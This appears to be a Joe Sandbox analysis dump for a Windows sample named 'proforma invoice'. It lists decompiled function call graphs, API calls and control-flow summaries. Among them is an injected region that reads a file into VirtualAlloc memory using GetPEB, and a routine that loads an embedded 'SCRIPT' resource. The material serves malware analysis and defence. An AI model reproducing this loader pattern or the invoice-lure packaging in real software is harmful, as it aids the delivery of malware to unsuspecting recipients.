67 API calls 96208->96211 96208->96227 96232 b12171 96209->96232 96213 ace678 67 API calls 96210->96213 96214 b12381 96210->96214 96211->96227 96213->96214 96218 ace678 67 API calls 96214->96218 96214->96227 96215 b1239d 96216 b123c3 96215->96216 96217 b123a3 96215->96217 96239 b123f3 96216->96239 96219 b123b0 96217->96219 96221 ace678 67 API calls 96217->96221 96218->96227 96222 ace678 67 API calls 96219->96222 96219->96227 96221->96219 96222->96227 96223 b123ca 96224 b123de 96223->96224 96247 ace678 96223->96247 96226 ace678 67 API calls 96224->96226 96224->96227 96226->96227 96227->95882 96229 b12565 __fread_nolock 96228->96229 96230 b1257c 96228->96230 
96229->96207 96231 ace8c4 __fread_nolock 40 API calls 96230->96231 96231->96229 96233 acea0c ___std_exception_copy 21 API calls 96232->96233 96234 b1217f 96233->96234 96235 acea0c ___std_exception_copy 21 API calls 96234->96235 96236 b12190 96235->96236 96237 acea0c ___std_exception_copy 21 API calls 96236->96237 96238 b1219c 96237->96238 96238->96215 96246 b12408 96239->96246 96240 b124c0 96264 b12724 96240->96264 96241 b121cc 40 API calls 96241->96246 96243 b124c7 96243->96223 96246->96240 96246->96241 96246->96243 96260 b12606 96246->96260 96268 b12269 40 API calls 96246->96268 96248 ace684 ___BuildCatchObject 96247->96248 96249 ace6aa 96248->96249 96250 ace695 96248->96250 96259 ace6a5 __wsopen_s 96249->96259 96304 ac918d EnterCriticalSection 96249->96304 96321 acf2d9 20 API calls _free 96250->96321 96252 ace69a 96322 ad27ec 26 API calls _strftime 96252->96322 96255 ace6c6 96305 ace602 96255->96305 96257 ace6d1 96323 ace6ee LeaveCriticalSection __fread_nolock 96257->96323 96259->96224 96261 b12617 96260->96261 96263 b1261d 96260->96263 96261->96263 96269 b126d7 96261->96269 96263->96246 96265 b12731 96264->96265 96266 b12742 96264->96266 96267 acdbb3 65 API calls 96265->96267 96266->96243 96267->96266 96268->96246 96270 b12703 96269->96270 96271 b12714 96269->96271 96273 acdbb3 96270->96273 96271->96261 96274 acdbdd 96273->96274 96275 acdbc1 96273->96275 96274->96271 96275->96274 96276 acdbcd 96275->96276 96277 acdbe3 96275->96277 96285 acf2d9 20 API calls _free 96276->96285 96282 acd9cc 96277->96282 96280 acdbd2 96286 ad27ec 26 API calls _strftime 96280->96286 96287 acd97b 96282->96287 96284 acd9f0 96284->96274 96285->96280 96286->96274 96288 acd987 ___BuildCatchObject 96287->96288 96295 ac918d EnterCriticalSection 96288->96295 96290 acd995 96296 acd9f4 96290->96296 96294 acd9b3 __wsopen_s 96294->96284 96295->96290 96297 ad49a1 27 API calls 96296->96297 96298 acda09 96297->96298 96299 acda3a 62 API calls 96298->96299 96300 acda24 96299->96300 96301 ad4a56 62 
API calls 96300->96301 96302 acd9a2 96301->96302 96303 acd9c0 LeaveCriticalSection __fread_nolock 96302->96303 96303->96294 96304->96255 96306 ace60f 96305->96306 96307 ace624 96305->96307 96349 acf2d9 20 API calls _free 96306->96349 96319 ace61f 96307->96319 96324 acdc0b 96307->96324 96310 ace614 96350 ad27ec 26 API calls _strftime 96310->96350 96315 acd955 __fread_nolock 26 API calls 96316 ace646 96315->96316 96334 ad862f 96316->96334 96319->96257 96320 ad29c8 _free 20 API calls 96320->96319 96321->96252 96322->96259 96323->96259 96325 acdc23 96324->96325 96329 acdc1f 96324->96329 96326 acd955 __fread_nolock 26 API calls 96325->96326 96325->96329 96327 acdc43 96326->96327 96351 ad59be 96327->96351 96330 ad4d7a 96329->96330 96331 ace640 96330->96331 96332 ad4d90 96330->96332 96331->96315 96332->96331 96333 ad29c8 _free 20 API calls 96332->96333 96333->96331 96335 ad863e 96334->96335 96336 ad8653 96334->96336 96474 acf2c6 20 API calls _free 96335->96474 96337 ad868e 96336->96337 96342 ad867a 96336->96342 96476 acf2c6 20 API calls _free 96337->96476 96339 ad8643 96475 acf2d9 20 API calls _free 96339->96475 96471 ad8607 96342->96471 96343 ad8693 96477 acf2d9 20 API calls _free 96343->96477 96346 ace64c 96346->96319 96346->96320 96347 ad869b 96478 ad27ec 26 API calls _strftime 96347->96478 96349->96310 96350->96319 96352 ad59ca ___BuildCatchObject 96351->96352 96353 ad59ea 96352->96353 96354 ad59d2 96352->96354 96356 ad5a88 96353->96356 96361 ad5a1f 96353->96361 96430 acf2c6 20 API calls _free 96354->96430 96435 acf2c6 20 API calls _free 96356->96435 96357 ad59d7 96431 acf2d9 20 API calls _free 96357->96431 96360 ad5a8d 96436 acf2d9 20 API calls _free 96360->96436 96376 ad5147 EnterCriticalSection 96361->96376 96362 ad59df __wsopen_s 96362->96329 96365 ad5a95 96437 ad27ec 26 API calls _strftime 96365->96437 96366 ad5a25 96368 ad5a56 96366->96368 96369 ad5a41 96366->96369 96377 ad5aa9 96368->96377 96432 acf2d9 20 API calls _free 96369->96432 96372 ad5a46 96433 acf2c6 
20 API calls _free 96372->96433 96373 ad5a51 96434 ad5a80 LeaveCriticalSection __wsopen_s 96373->96434 96376->96366 96378 ad5ad7 96377->96378 96379 ad5ad0 96377->96379 96380 ad5adb 96378->96380 96381 ad5afa 96378->96381 96462 ac0a8c 96379->96462 96445 acf2c6 20 API calls _free 96380->96445 96385 ad5b4b 96381->96385 96386 ad5b2e 96381->96386 96384 ad5ae0 96446 acf2d9 20 API calls _free 96384->96446 96389 ad5b61 96385->96389 96451 ad9424 28 API calls __fread_nolock 96385->96451 96448 acf2c6 20 API calls _free 96386->96448 96387 ad5cb1 96387->96373 96438 ad564e 96389->96438 96391 ad5ae7 96447 ad27ec 26 API calls _strftime 96391->96447 96394 ad5b33 96449 acf2d9 20 API calls _free 96394->96449 96398 ad5b3b 96450 ad27ec 26 API calls _strftime 96398->96450 96399 ad5b6f 96404 ad5b95 96399->96404 96405 ad5b73 96399->96405 96400 ad5ba8 96402 ad5bbc 96400->96402 96403 ad5c02 WriteFile 96400->96403 96408 ad5bc4 96402->96408 96409 ad5bf2 96402->96409 96406 ad5c25 GetLastError 96403->96406 96412 ad5b8b 96403->96412 96453 ad542e 45 API calls 3 library calls 96404->96453 96410 ad5c69 96405->96410 96452 ad55e1 GetLastError WriteConsoleW CreateFileW __wsopen_s 96405->96452 96406->96412 96413 ad5bc9 96408->96413 96414 ad5be2 96408->96414 96456 ad56c4 7 API calls 2 library calls 96409->96456 96410->96379 96460 acf2d9 20 API calls _free 96410->96460 96412->96379 96412->96410 96421 ad5c45 96412->96421 96413->96410 96418 ad5bd2 96413->96418 96455 ad5891 8 API calls 2 library calls 96414->96455 96416 ad5be0 96416->96412 96454 ad57a3 7 API calls 2 library calls 96418->96454 96420 ad5c8e 96461 acf2c6 20 API calls _free 96420->96461 96424 ad5c4c 96421->96424 96425 ad5c60 96421->96425 96457 acf2d9 20 API calls _free 96424->96457 96459 acf2a3 20 API calls 2 library calls 96425->96459 96428 ad5c51 96458 acf2c6 20 API calls _free 96428->96458 96430->96357 96431->96362 96432->96372 96433->96373 96434->96362 96435->96360 96436->96365 96437->96362 96439 adf89b __fread_nolock 26 API calls 
96438->96439 96440 ad565e 96439->96440 96441 ad5663 96440->96441 96469 ad2d74 38 API calls 2 library calls 96440->96469 96441->96399 96441->96400 96443 ad5686 96443->96441 96444 ad56a4 GetConsoleMode 96443->96444 96444->96441 96445->96384 96446->96391 96447->96379 96448->96394 96449->96398 96450->96379 96451->96389 96452->96412 96453->96412 96454->96416 96455->96416 96456->96416 96457->96428 96458->96379 96459->96379 96460->96420 96461->96379 96463 ac0a95 96462->96463 96464 ac0a97 IsProcessorFeaturePresent 96462->96464 96463->96387 96466 ac0c5d 96464->96466 96470 ac0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96466->96470 96468 ac0d40 96468->96387 96469->96443 96470->96468 96479 ad8585 96471->96479 96473 ad862b 96473->96346 96474->96339 96475->96346 96476->96343 96477->96347 96478->96346 96480 ad8591 ___BuildCatchObject 96479->96480 96490 ad5147 EnterCriticalSection 96480->96490 96482 ad859f 96483 ad85c6 96482->96483 96484 ad85d1 96482->96484 96491 ad86ae 96483->96491 96506 acf2d9 20 API calls _free 96484->96506 96487 ad85cc 96507 ad85fb LeaveCriticalSection __wsopen_s 96487->96507 96489 ad85ee __wsopen_s 96489->96473 96490->96482 96508 ad53c4 96491->96508 96493 ad86be 96494 ad86c4 96493->96494 96495 ad86f6 96493->96495 96497 ad53c4 __wsopen_s 26 API calls 96493->96497 96521 ad5333 21 API calls 3 library calls 96494->96521 96495->96494 96498 ad53c4 __wsopen_s 26 API calls 96495->96498 96500 ad86ed 96497->96500 96501 ad8702 FindCloseChangeNotification 96498->96501 96499 ad871c 96502 ad873e 96499->96502 96522 acf2a3 20 API calls 2 library calls 96499->96522 96504 ad53c4 __wsopen_s 26 API calls 96500->96504 96501->96494 96505 ad870e GetLastError 96501->96505 96502->96487 96504->96495 96505->96494 96506->96487 96507->96489 96509 ad53d1 96508->96509 96511 ad53e6 96508->96511 96510 acf2c6 __dosmaperr 20 API calls 96509->96510 96513 ad53d6 96510->96513 96512 acf2c6 __dosmaperr 20 API calls 96511->96512 96515 ad540b 
96511->96515 96516 ad5416 96512->96516 96514 acf2d9 _free 20 API calls 96513->96514 96517 ad53de 96514->96517 96515->96493 96518 acf2d9 _free 20 API calls 96516->96518 96517->96493 96519 ad541e 96518->96519 96520 ad27ec _strftime 26 API calls 96519->96520 96520->96517 96521->96499 96522->96502 96523->95759 96524 ae2ba5 96525 ae2baf 96524->96525 96526 aa2b25 96524->96526 96567 aa3a5a 96525->96567 96552 aa2b83 7 API calls 96526->96552 96530 ae2bb8 96574 aa9cb3 96530->96574 96533 aa2b2f 96542 aa2b44 96533->96542 96556 aa3837 96533->96556 96534 ae2bc6 96535 ae2bce 96534->96535 96536 ae2bf5 96534->96536 96580 aa33c6 96535->96580 96537 aa33c6 22 API calls 96536->96537 96550 ae2bf1 GetForegroundWindow ShellExecuteW 96537->96550 96543 aa2b5f 96542->96543 96566 aa30f2 Shell_NotifyIconW ___scrt_fastfail 96542->96566 96548 aa2b66 SetCurrentDirectoryW 96543->96548 96547 aa33c6 22 API calls 96547->96550 96551 aa2b7a 96548->96551 96549 ae2c26 96549->96543 96550->96549 96598 aa2cd4 7 API calls 96552->96598 96554 aa2b2a 96555 aa2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 96554->96555 96555->96533 96557 aa3862 ___scrt_fastfail 96556->96557 96599 aa4212 96557->96599 96560 aa38e8 96562 ae3386 Shell_NotifyIconW 96560->96562 96563 aa3906 Shell_NotifyIconW 96560->96563 96603 aa3923 96563->96603 96565 aa391c 96565->96542 96566->96543 96568 ae1f50 __wsopen_s 96567->96568 96569 aa3a67 GetModuleFileNameW 96568->96569 96570 aa9cb3 22 API calls 96569->96570 96571 aa3a8d 96570->96571 96572 aa3aa2 23 API calls 96571->96572 96573 aa3a97 96572->96573 96573->96530 96575 aa9cc2 _wcslen 96574->96575 96576 abfe0b 22 API calls 96575->96576 96577 aa9cea __fread_nolock 96576->96577 96578 abfddb 22 API calls 96577->96578 96579 aa9d00 96578->96579 96579->96534 96581 ae30bb 96580->96581 96582 aa33dd 96580->96582 96584 abfddb 22 API calls 96581->96584 96635 aa33ee 96582->96635 96586 ae30c5 _wcslen 96584->96586 96585 aa33e8 96589 aa6350 96585->96589 96587 abfe0b 22 API calls 96586->96587 96588 
ae30fe __fread_nolock 96587->96588 96590 aa6362 96589->96590 96591 ae4a51 96589->96591 96650 aa6373 96590->96650 96660 aa4a88 22 API calls __fread_nolock 96591->96660 96594 aa636e 96594->96547 96595 ae4a5b 96596 ae4a67 96595->96596 96597 aaa8c7 22 API calls 96595->96597 96597->96596 96598->96554 96600 ae35a4 96599->96600 96601 aa38b7 96599->96601 96600->96601 96602 ae35ad DestroyIcon 96600->96602 96601->96560 96625 b0c874 42 API calls _strftime 96601->96625 96602->96601 96604 aa393f 96603->96604 96605 aa3a13 96603->96605 96626 aa6270 96604->96626 96605->96565 96608 aa395a 96610 aa6b57 22 API calls 96608->96610 96609 ae3393 LoadStringW 96611 ae33ad 96609->96611 96612 aa396f 96610->96612 96619 aa3994 ___scrt_fastfail 96611->96619 96631 aaa8c7 96611->96631 96613 aa397c 96612->96613 96614 ae33c9 96612->96614 96613->96611 96616 aa3986 96613->96616 96617 aa6350 22 API calls 96614->96617 96618 aa6350 22 API calls 96616->96618 96620 ae33d7 96617->96620 96618->96619 96622 aa39f9 Shell_NotifyIconW 96619->96622 96620->96619 96621 aa33c6 22 API calls 96620->96621 96623 ae33f9 96621->96623 96622->96605 96624 aa33c6 22 API calls 96623->96624 96624->96619 96625->96560 96627 abfe0b 22 API calls 96626->96627 96628 aa6295 96627->96628 96629 abfddb 22 API calls 96628->96629 96630 aa394d 96629->96630 96630->96608 96630->96609 96632 aaa8ea __fread_nolock 96631->96632 96633 aaa8db 96631->96633 96632->96619 96633->96632 96634 abfe0b 22 API calls 96633->96634 96634->96632 96636 aa33fe _wcslen 96635->96636 96637 ae311d 96636->96637 96638 aa3411 96636->96638 96639 abfddb 22 API calls 96637->96639 96645 aaa587 96638->96645 96641 ae3127 96639->96641 96643 abfe0b 22 API calls 96641->96643 96642 aa341e __fread_nolock 96642->96585 96644 ae3157 __fread_nolock 96643->96644 96646 aaa59d 96645->96646 96649 aaa598 __fread_nolock 96645->96649 96647 aef80f 96646->96647 96648 abfe0b 22 API calls 96646->96648 96648->96649 96649->96642 96651 aa63b6 __fread_nolock 96650->96651 96652 aa6382 96650->96652 
96651->96594 96652->96651 96653 ae4a82 96652->96653 96654 aa63a9 96652->96654 96655 abfddb 22 API calls 96653->96655 96656 aaa587 22 API calls 96654->96656 96657 ae4a91 96655->96657 96656->96651 96658 abfe0b 22 API calls 96657->96658 96659 ae4ac5 __fread_nolock 96658->96659 96660->96595 96661 210295b 96662 2102960 96661->96662 96663 2100000 GetPEB 96662->96663 96664 210296c 96663->96664 96665 2102a20 96664->96665 96666 210298a 96664->96666 96683 21032d0 9 API calls 96665->96683 96670 2102630 96666->96670 96669 2102a07 96671 2100000 GetPEB 96670->96671 96674 21026cf 96671->96674 96673 2102700 CreateFileW 96673->96674 96679 210270d 96673->96679 96675 2102729 VirtualAlloc 96674->96675 96674->96679 96681 2102830 FindCloseChangeNotification 96674->96681 96682 2102840 VirtualFree 96674->96682 96684 2103540 GetPEB 96674->96684 96676 210274a ReadFile 96675->96676 96675->96679 96676->96679 96680 2102768 VirtualAlloc 96676->96680 96677 210292a 96677->96669 96678 210291c VirtualFree 96678->96677 96679->96677 96679->96678 96680->96674 96680->96679 96681->96674 96682->96674 96683->96669 96685 210356a 96684->96685 96685->96673 96686 aa1044 96691 aa10f3 96686->96691 96688 aa104a 96727 ac00a3 29 API calls __onexit 96688->96727 96690 aa1054 96728 aa1398 96691->96728 96695 aa116a 96696 aaa961 22 API calls 96695->96696 96697 aa1174 96696->96697 96698 aaa961 22 API calls 96697->96698 96699 aa117e 96698->96699 96700 aaa961 22 API calls 96699->96700 96701 aa1188 96700->96701 96702 aaa961 22 API calls 96701->96702 96703 aa11c6 96702->96703 96704 aaa961 22 API calls 96703->96704 96705 aa1292 96704->96705 96738 aa171c 96705->96738 96709 aa12c4 96710 aaa961 22 API calls 96709->96710 96711 aa12ce 96710->96711 96759 ab1940 96711->96759 96713 aa12f9 96769 aa1aab 96713->96769 96715 aa1315 96716 aa1325 GetStdHandle 96715->96716 96717 aa137a 96716->96717 96718 ae2485 96716->96718 96721 aa1387 OleInitialize 96717->96721 96718->96717 96719 ae248e 96718->96719 96720 abfddb 22 API calls 96719->96720 
96722 ae2495 96720->96722 96721->96688 96776 b1011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 96722->96776 96724 ae249e 96777 b10944 CreateThread 96724->96777 96726 ae24aa CloseHandle 96726->96717 96727->96690 96778 aa13f1 96728->96778 96731 aa13f1 22 API calls 96732 aa13d0 96731->96732 96733 aaa961 22 API calls 96732->96733 96734 aa13dc 96733->96734 96735 aa6b57 22 API calls 96734->96735 96736 aa1129 96735->96736 96737 aa1bc3 6 API calls 96736->96737 96737->96695 96739 aaa961 22 API calls 96738->96739 96740 aa172c 96739->96740 96741 aaa961 22 API calls 96740->96741 96742 aa1734 96741->96742 96743 aaa961 22 API calls 96742->96743 96744 aa174f 96743->96744 96745 abfddb 22 API calls 96744->96745 96746 aa129c 96745->96746 96747 aa1b4a 96746->96747 96748 aa1b58 96747->96748 96749 aaa961 22 API calls 96748->96749 96750 aa1b63 96749->96750 96751 aaa961 22 API calls 96750->96751 96752 aa1b6e 96751->96752 96753 aaa961 22 API calls 96752->96753 96754 aa1b79 96753->96754 96755 aaa961 22 API calls 96754->96755 96756 aa1b84 96755->96756 96757 abfddb 22 API calls 96756->96757 96758 aa1b96 RegisterWindowMessageW 96757->96758 96758->96709 96760 ab1981 96759->96760 96761 ab195d 96759->96761 96785 ac0242 5 API calls __Init_thread_wait 96760->96785 96768 ab196e 96761->96768 96787 ac0242 5 API calls __Init_thread_wait 96761->96787 96763 ab198b 96763->96761 96786 ac01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96763->96786 96765 ab8727 96765->96768 96788 ac01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96765->96788 96768->96713 96770 aa1abb 96769->96770 96771 ae272d 96769->96771 96772 abfddb 22 API calls 96770->96772 96789 b13209 23 API calls 96771->96789 96774 aa1ac3 96772->96774 96774->96715 96775 ae2738 96776->96724 96777->96726 96790 b1092a 28 API calls 96777->96790 96779 aaa961 22 API calls 96778->96779 96780 aa13fc 96779->96780 96781 aaa961 22 API calls 96780->96781 96782 
aa1404 96781->96782 96783 aaa961 22 API calls 96782->96783 96784 aa13c6 96783->96784 96784->96731 96785->96763 96786->96761 96787->96765 96788->96768 96789->96775 96791 af2a00 96805 aad7b0 ISource 96791->96805 96792 aadb11 PeekMessageW 96792->96805 96793 aad807 GetInputState 96793->96792 96793->96805 96794 af1cbe TranslateAcceleratorW 96794->96805 96796 aadb8f PeekMessageW 96796->96805 96797 aadb73 TranslateMessage DispatchMessageW 96797->96796 96798 aada04 timeGetTime 96798->96805 96799 aadbaf Sleep 96816 aadbc0 96799->96816 96800 af2b74 Sleep 96800->96816 96801 af1dda timeGetTime 96967 abe300 23 API calls 96801->96967 96802 abe551 timeGetTime 96802->96816 96805->96792 96805->96793 96805->96794 96805->96796 96805->96797 96805->96798 96805->96799 96805->96800 96805->96801 96807 aad9d5 96805->96807 96823 aadd50 96805->96823 96830 aadfd0 96805->96830 96853 ab1310 96805->96853 96908 aabf40 96805->96908 96966 abedf6 IsDialogMessageW GetClassLongW 96805->96966 96968 b13a2a 23 API calls 96805->96968 96969 aaec40 96805->96969 96993 b1359c 82 API calls __wsopen_s 96805->96993 96806 af2c0b GetExitCodeProcess 96810 af2c37 CloseHandle 96806->96810 96811 af2c21 WaitForSingleObject 96806->96811 96808 b329bf GetForegroundWindow 96808->96816 96810->96816 96811->96805 96811->96810 96812 af2a31 96812->96807 96813 af2ca9 Sleep 96813->96805 96816->96802 96816->96805 96816->96806 96816->96807 96816->96808 96816->96812 96816->96813 96994 b25658 23 API calls 96816->96994 96995 b0e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 96816->96995 96996 b0d4dc 47 API calls 96816->96996 96824 aadd6f 96823->96824 96825 aadd83 96823->96825 96997 aad260 239 API calls 2 library calls 96824->96997 96998 b1359c 82 API calls __wsopen_s 96825->96998 96828 aadd7a 96828->96805 96829 af2f75 96829->96829 96831 aae010 96830->96831 96848 aae0dc ISource 96831->96848 97001 ac0242 5 API calls __Init_thread_wait 96831->97001 96834 af2fca 96836 aaa961 22 API calls 
96834->96836 96834->96848 96835 aaa961 22 API calls 96835->96848 96837 af2fe4 96836->96837 97002 ac00a3 29 API calls __onexit 96837->97002 96841 af2fee 97003 ac01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96841->97003 96844 aaec40 239 API calls 96844->96848 96846 aaa8c7 22 API calls 96846->96848 96847 ab04f0 22 API calls 96847->96848 96848->96835 96848->96844 96848->96846 96848->96847 96849 aae3e1 96848->96849 96850 b1359c 82 API calls 96848->96850 96999 aaa81b 41 API calls 96848->96999 97000 aba308 239 API calls 96848->97000 97004 ac0242 5 API calls __Init_thread_wait 96848->97004 97005 ac00a3 29 API calls __onexit 96848->97005 97006 ac01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96848->97006 97007 b247d4 239 API calls 96848->97007 97008 b268c1 239 API calls 96848->97008 96849->96805 96850->96848 96854 ab17b0 96853->96854 96855 ab1376 96853->96855 97139 ac0242 5 API calls __Init_thread_wait 96854->97139 96857 ab1390 96855->96857 96858 af6331 96855->96858 96859 ab1940 9 API calls 96857->96859 96860 af633d 96858->96860 97144 b2709c 239 API calls 96858->97144 96863 ab13a0 96859->96863 96860->96805 96862 ab17ba 96864 ab17fb 96862->96864 96866 aa9cb3 22 API calls 96862->96866 96865 ab1940 9 API calls 96863->96865 96868 af6346 96864->96868 96870 ab182c 96864->96870 96867 ab13b6 96865->96867 96874 ab17d4 96866->96874 96867->96864 96869 ab13ec 96867->96869 97145 b1359c 82 API calls __wsopen_s 96868->97145 96869->96868 96894 ab1408 __fread_nolock 96869->96894 97141 aaaceb 23 API calls ISource 96870->97141 96873 ab1839 97142 abd217 239 API calls 96873->97142 97140 ac01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96874->97140 96877 af636e 97146 b1359c 82 API calls __wsopen_s 96877->97146 96878 ab152f 96880 ab153c 96878->96880 96881 af63d1 96878->96881 96882 ab1940 9 API calls 96880->96882 97148 b25745 54 API calls _wcslen 96881->97148 96884 ab1549 96882->96884 96888 ab1940 9 API calls 96884->96888 96899 ab15c7 
ISource 96884->96899 96885 abfddb 22 API calls 96885->96894 96886 abfe0b 22 API calls 96886->96894 96887 ab1872 97143 abfaeb 23 API calls 96887->97143 96897 ab1563 96888->96897 96889 ab171d 96889->96805 96892 aaec40 239 API calls 96892->96894 96893 ab167b ISource 96893->96889 97138 abce17 22 API calls ISource 96893->97138 96894->96873 96894->96877 96894->96878 96894->96885 96894->96886 96894->96892 96895 af63b2 96894->96895 96894->96899 97147 b1359c 82 API calls __wsopen_s 96895->97147 96897->96899 96901 aaa8c7 22 API calls 96897->96901 96898 ab1940 9 API calls 96898->96899 96899->96887 96899->96893 96899->96898 96904 aa4f39 68 API calls 96899->96904 97009 b2d482 96899->97009 97049 b0d4ce 96899->97049 97052 b2959f 96899->97052 97055 b16ef1 96899->97055 97135 b2958b 96899->97135 97149 b1359c 82 API calls __wsopen_s 96899->97149 96901->96899 96904->96899 97507 aaadf0 96908->97507 96910 aabf9d 96911 aabfa9 96910->96911 96912 af04b6 96910->96912 96914 af04c6 96911->96914 96915 aac01e 96911->96915 97520 b1359c 82 API calls __wsopen_s 96912->97520 97521 b1359c 82 API calls __wsopen_s 96914->97521 97512 aaac91 96915->97512 96918 aac7da 96922 abfe0b 22 API calls 96918->96922 96927 aac808 __fread_nolock 96922->96927 96924 af04f5 96928 af055a 96924->96928 97522 abd217 239 API calls 96924->97522 96931 abfe0b 22 API calls 96927->96931 96965 aac603 96928->96965 97523 b1359c 82 API calls __wsopen_s 96928->97523 96929 b07120 22 API calls 96951 aac039 ISource __fread_nolock 96929->96951 96930 af091a 97533 b13209 23 API calls 96930->97533 96958 aac350 ISource __fread_nolock 96931->96958 96932 aaaf8a 22 API calls 96932->96951 96935 aaec40 239 API calls 96935->96951 96936 af08a5 96937 aaec40 239 API calls 96936->96937 96939 af08cf 96937->96939 96939->96965 97531 aaa81b 41 API calls 96939->97531 96940 af0591 97524 b1359c 82 API calls __wsopen_s 96940->97524 96941 af08f6 97532 b1359c 82 API calls __wsopen_s 96941->97532 96946 aabbe0 40 API calls 96946->96951 96947 aac3ac 96947->96805 
96949 aac237 96950 aac253 96949->96950 96953 aaa8c7 22 API calls 96949->96953 96954 af0976 96950->96954 96960 aac297 ISource 96950->96960 96951->96918 96951->96924 96951->96927 96951->96928 96951->96929 96951->96930 96951->96932 96951->96935 96951->96936 96951->96940 96951->96941 96951->96946 96951->96949 96952 abfe0b 22 API calls 96951->96952 96956 abfddb 22 API calls 96951->96956 96959 af09bf 96951->96959 96951->96965 97516 aaad81 22 API calls 96951->97516 97525 b07099 22 API calls __fread_nolock 96951->97525 97526 b25745 54 API calls _wcslen 96951->97526 97527 abaa42 22 API calls ISource 96951->97527 97528 b0f05c 40 API calls 96951->97528 97529 aaa993 41 API calls 96951->97529 97530 aaaceb 23 API calls ISource 96951->97530 96952->96951 96953->96950 97534 aaaceb 23 API calls ISource 96954->97534 96956->96951 96958->96947 97519 abce17 22 API calls ISource 96958->97519 96959->96965 97535 b1359c 82 API calls __wsopen_s 96959->97535 96960->96959 97517 aaaceb 23 API calls ISource 96960->97517 96962 aac335 96962->96959 96963 aac342 96962->96963 97518 aaa704 22 API calls ISource 96963->97518 96965->96805 96966->96805 96967->96805 96968->96805 96988 aaec76 ISource 96969->96988 96970 abfddb 22 API calls 96970->96988 96971 aafef7 96979 aaa8c7 22 API calls 96971->96979 96984 aaed9d ISource 96971->96984 96974 af4b0b 97540 b1359c 82 API calls __wsopen_s 96974->97540 96975 aaa8c7 22 API calls 96975->96988 96976 af4600 96981 aaa8c7 22 API calls 96976->96981 96976->96984 96979->96984 96980 ac0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96980->96988 96981->96984 96983 aafbe3 96983->96984 96987 af4bdc 96983->96987 96992 aaf3ae ISource 96983->96992 96984->96805 96985 aaa961 22 API calls 96985->96988 96986 ac00a3 29 API calls pre_c_initialization 96986->96988 97541 b1359c 82 API calls __wsopen_s 96987->97541 96988->96970 96988->96971 96988->96974 96988->96975 96988->96976 96988->96980 96988->96983 96988->96984 

                  Control-flow Graph
                  • Entry block: aa42de-aa434d (call aaa961, GetVersionExW, call aa6b57)
                  • API blocks: aa441b-aa4435 GetCurrentProcess, IsWow64Process; aa444f-aa445e LoadLibraryA; aa4460-aa446e GetProcAddress; aa4470-aa4474 GetNativeSystemInfo; aa447a-aa447b FreeLibrary; aa449c-aa44a6 GetSystemInfo; ae3824-ae3828 GetSystemInfo
                  • Edge listing not reproduced
                  APIs
                  • GetVersionExW.KERNEL32(?), ref: 00AA430D
                    • Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A
                  • GetCurrentProcess.KERNEL32(?,00B3CB64,00000000,?,?), ref: 00AA4422
                  • IsWow64Process.KERNEL32(00000000,?,?), ref: 00AA4429
                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00AA4454
                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00AA4466
                  • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00AA4474
                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 00AA447B
                  • GetSystemInfo.KERNEL32(?,?,?), ref: 00AA44A0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                  • String ID: GetNativeSystemInfo$kernel32.dll$|O
                  • API String ID: 3290436268-3101561225
                  • Opcode ID: c87386940259280d32d87b1a354880ac706b92295ed3d48529ad40afb2c977bc
                  • Instruction ID: 9d279624437f9a59dd468a3096eb8b8f671cc8e033a3463b36224515468e012d
                  • Opcode Fuzzy Hash: c87386940259280d32d87b1a354880ac706b92295ed3d48529ad40afb2c977bc
                  • Instruction Fuzzy Hash: 44A1D67290A2C0FFCB11CB7D7C451997FF46B6A300B168C99E08DA7AE2DB604584DB39

                  Control-flow Graph
                  • Entry block: aa42a2-aa42ba (CreateStreamOnHGlobal)
                  • API blocks: aa42bc-aa42d3 FindResourceExW; ae35ba-ae35c9 LoadResource; ae35cf-ae35dd SizeofResource; ae35e3-ae35ee LockResource
                  • Edge listing not reproduced
                  APIs
                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00AA50AA,?,?,00000000,00000000), ref: 00AA42B2
                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00AA50AA,?,?,00000000,00000000), ref: 00AA42C9
                  • LoadResource.KERNEL32(?,00000000,?,?,00AA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00AA4F20), ref: 00AE35BE
                  • SizeofResource.KERNEL32(?,00000000,?,?,00AA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00AA4F20), ref: 00AE35D3
                  • LockResource.KERNEL32(00AA50AA,?,?,00AA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00AA4F20,?), ref: 00AE35E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
